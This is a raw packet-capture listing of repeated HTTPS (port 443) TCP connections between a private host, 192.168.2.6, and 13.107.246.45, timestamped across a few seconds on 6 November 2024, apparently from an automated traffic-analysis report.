                                              Nov 6, 2024 17:03:37.864618063 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.895162106 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.895230055 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.895284891 CET50200443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.895457029 CET50200443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.895471096 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.895481110 CET50200443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.895486116 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.897804022 CET50203443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.897845984 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.897911072 CET50203443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.898034096 CET50203443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.898051023 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.974746943 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.974817038 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.974864960 CET50201443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.974996090 CET50201443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.975016117 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.975025892 CET50201443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.975030899 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.977444887 CET50204443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.977483988 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.977555990 CET50204443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.977690935 CET50204443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.977700949 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.552603960 CET50151443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.554349899 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.554383039 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.554456949 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.554588079 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.554600000 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.605745077 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.606204033 CET50202443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.606235981 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.606682062 CET50202443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.606687069 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.660408020 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.660908937 CET50203443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.660927057 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.661336899 CET50203443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.661343098 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.719651937 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.720228910 CET50204443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.720246077 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.720896006 CET50204443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.720901012 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.740325928 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.740360975 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.740401983 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.740411997 CET50202443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.740443945 CET50202443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.740664959 CET50202443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.740683079 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.740693092 CET50202443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.740698099 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.743592978 CET50206443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.743622065 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.743691921 CET50206443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.743866920 CET50206443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.743880987 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.796003103 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.796076059 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.796139956 CET50203443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.796309948 CET50203443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.796323061 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.796334028 CET50203443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.796339035 CET4435020313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.798711061 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.798744917 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.798799992 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.798952103 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.798964977 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.851020098 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.851109028 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.851190090 CET50204443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.851387978 CET50204443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.851399899 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.851411104 CET50204443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.851417065 CET4435020413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.853950024 CET50208443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.853986979 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:38.854072094 CET50208443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.854217052 CET50208443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:38.854232073 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.558281898 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.559000015 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.559020996 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.559453964 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.559458971 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.626811028 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.627283096 CET50208443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.627324104 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.627979040 CET50208443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.627985001 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.698788881 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.698822021 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.698875904 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.698908091 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.698936939 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.699181080 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.699193954 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.699204922 CET50207443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.699210882 CET4435020713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.702116966 CET50209443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.702157974 CET4435020913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.702235937 CET50209443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.702408075 CET50209443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.702421904 CET4435020913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.760037899 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.760099888 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.760292053 CET50208443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.760415077 CET50208443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.760436058 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.760449886 CET50208443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.760456085 CET4435020813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.763309002 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.763334990 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.763438940 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.763607025 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.763617039 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.842904091 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.843393087 CET50206443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.843406916 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.843950987 CET50206443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.843955994 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.972759008 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.972815990 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.972948074 CET50206443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.973295927 CET50206443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.973295927 CET50206443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.973309040 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.973335981 CET4435020613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.976440907 CET50211443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.976488113 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:39.976557016 CET50211443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.976691008 CET50211443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:39.976705074 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.302544117 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.303154945 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.303174019 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.303591013 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.303596020 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.432054043 CET4435020913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.432794094 CET50209443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.432807922 CET4435020913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.432965994 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.433125019 CET50209443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.433130026 CET4435020913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.433166981 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.433209896 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.433212996 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.433264017 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.433432102 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.433444977 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.433454990 CET50205443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.433460951 CET4435020513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.436331987 CET50212443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.436377048 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.436460018 CET50212443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.436646938 CET50212443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.436664104 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.484378099 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.485363007 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.485393047 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.485694885 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.485699892 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.561062098 CET4435020913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.561562061 CET4435020913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.561723948 CET50209443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.561723948 CET50209443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.564120054 CET50209443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.564136028 CET4435020913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.564162016 CET50213443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.564207077 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.564270973 CET50213443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.564423084 CET50213443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.564434052 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.613311052 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.613342047 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.613387108 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.613537073 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.613537073 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.613629103 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.613650084 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.613667965 CET50210443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.613673925 CET4435021013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.616147041 CET50214443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.616192102 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.616286039 CET50214443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.616466999 CET50214443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.616482019 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.717020988 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.717468977 CET50211443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.717483997 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.717936993 CET50211443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.717943907 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.848217964 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.848292112 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.848387957 CET50211443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.848572969 CET50211443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.848592043 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.848654985 CET50211443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.848661900 CET4435021113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.851496935 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.851532936 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:40.851609945 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.851748943 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:40.851771116 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.193468094 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.193912983 CET50212443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.193944931 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.194372892 CET50212443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.194379091 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.303385973 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.303823948 CET50213443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.303843021 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.304285049 CET50213443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.304290056 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.328773022 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.328852892 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.328918934 CET50212443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.329061031 CET50212443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.329087019 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.329098940 CET50212443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.329103947 CET4435021213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.331757069 CET50216443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.331809998 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.331912041 CET50216443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.332075119 CET50216443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.332089901 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.373788118 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.374283075 CET50214443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.374316931 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.374716043 CET50214443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.374721050 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.441714048 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.441747904 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.441802025 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.441909075 CET50213443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.442156076 CET50213443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.442183971 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.442194939 CET50213443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.442200899 CET4435021313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.445152998 CET50217443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.445219994 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.445302963 CET50217443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.445424080 CET50217443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.445444107 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.504673958 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.504756927 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.504875898 CET50214443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.505040884 CET50214443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.505075932 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.505093098 CET50214443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.505099058 CET4435021413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.508302927 CET50218443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.508353949 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.508426905 CET50218443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.508557081 CET50218443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.508572102 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.657596111 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.658174038 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.658190012 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.658641100 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.658646107 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.792157888 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.792196989 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.792241096 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.792290926 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.792323112 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.792546034 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.792561054 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.792572975 CET50215443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.792577982 CET4435021513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.795175076 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.795219898 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:41.795288086 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.795437098 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:41.795452118 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.061666965 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.062239885 CET50216443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.062269926 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.062829018 CET50216443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.062835932 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.173986912 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.174556017 CET50217443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.174586058 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.174999952 CET50217443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.175008059 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.190790892 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.190896034 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.190977097 CET50216443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.191220999 CET50216443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.191240072 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.191251993 CET50216443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.191257954 CET4435021613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.195441961 CET50220443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.195471048 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.195559978 CET50220443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.195709944 CET50220443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.195725918 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.240883112 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.273288965 CET50218443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.273317099 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.273746967 CET50218443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.273751974 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.303414106 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.303497076 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.303576946 CET50217443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.303931952 CET50217443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.303953886 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.303966045 CET50217443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.303972006 CET4435021713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.306519985 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.306566000 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.306641102 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.306791067 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.306807041 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.398076057 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.398379087 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.398443937 CET50218443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.399621964 CET50218443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.399652958 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.399693012 CET50218443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.399703026 CET4435021813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.407167912 CET50222443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.407205105 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.407268047 CET50222443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.407495975 CET50222443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.407506943 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.540333986 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.540838957 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.540873051 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.541317940 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.541323900 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.552824020 CET50160443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.554876089 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.554912090 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.554981947 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.555108070 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.555120945 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.672655106 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.672780991 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.672831059 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.672849894 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.672887087 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.672976017 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.672992945 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.673008919 CET50219443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.673013926 CET4435021913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.675594091 CET50224443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.675616980 CET4435022413.107.246.45192.168.2.6
